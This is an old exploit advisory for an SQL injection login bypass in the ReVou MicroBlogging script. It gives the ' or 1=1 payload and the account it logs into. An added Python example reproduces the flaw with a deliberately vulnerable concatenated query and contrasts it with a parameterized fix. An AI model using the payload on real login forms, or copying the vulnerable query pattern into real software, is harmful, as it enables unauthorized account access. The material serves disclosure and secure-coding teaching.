ReVou MicroBlogging Script Auth Bypass Vulnerability
Posted on 06 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ReVou MicroBlogging Script Auth Bypass Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
===================================================
ReVou MicroBlogging Script Auth Bypass Vulnerability
===================================================

Name              : ReVou MicroBlogging Script Auth Bypass Vulnerability
Date              : July 6, 2010
Critical Level    : VERY HIGH
Vendor URL        : http://www.revou.com/demo
Price             : free
Author            : ..::[ SONiC ]::.. aka ~the_pshyco~ &lt;sonicdefence[at]gmail.com&gt;
special thanks to : Sid3^effects, r0073r (inj3ct0r.com), L0rd CruSad3r, M4n0j, Bunny, Nishi, MA1201, RJ, D3aD F0x
greetz to         : www.topsecure.net, All ICW members, iNj3cT0r.com, www.andhrahackers.com
special Shoutz    : my Girl Frnd [H*****]

#######################################################################################################

Description :

Micro Blogging is a revolutionary PHP software that allows you to start your Twitter clone site.
ReVou offers you the next generation social networking and mobile blogging solution for your users
bringing more viral growth for your site.

#######################################################################################################

Xploit : SQLi vulnerability

DEMO URL http://www.revou.com/demo

Using ' or 1=1 or ''=' in both the username and password fields lets you log in as ALEXz

###############################################################################################################
# ..::[ SONiC ]::.. aka the_pshyco
# profile http://inj3ct0r.com/author/2545
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-06]</pre></body></html>
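The advisory does not show ReVou's login code, so the following is an added example (not the vendor's or the author's code) that reproduces the class of flaw against an in-memory SQLite table and contrasts it with a parameterized lookup plus out-of-band password verification. The table layout, the concatenated query and the sample accounts are assumptions constructed for illustration; only the input string and the account name ALEXz come from the advisory.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample data; the table layout is assumed, not ReVou's real schema.
ACCOUNTS = [("ALEXz", "correct horse"), ("bob", "hunter2")]
PAYLOAD = "' or 1=1 or ''='"  # the input quoted in the advisory


def kdf(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,"
               " password TEXT, salt BLOB, pw_hash BLOB)")
    for name, pw in ACCOUNTS:
        salt = os.urandom(16)
        db.execute("INSERT INTO users (username, password, salt, pw_hash)"
                   " VALUES (?, ?, ?, ?)", (name, pw, salt, kdf(pw, salt)))
    return db


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: form input is pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "' ORDER BY id LIMIT 1")
    # With PAYLOAD in both fields the WHERE clause contains "or 1=1", so it is
    # true for every row and the first account in the table is returned.
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Input is bound as data; the password is verified outside SQL."""
    row = db.execute("SELECT username, salt, pw_hash FROM users"
                     " WHERE username = ?", (username,)).fetchone()
    if row is None:
        return None
    ok = hmac.compare_digest(kdf(password, row[1]), row[2])
    return row[0] if ok else None


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized:", login_parameterized(db, PAYLOAD, PAYLOAD))
```

Because the bound version never compares the password inside the SQL statement, a quote in either field can no longer change the query's logic; it is simply an unknown username.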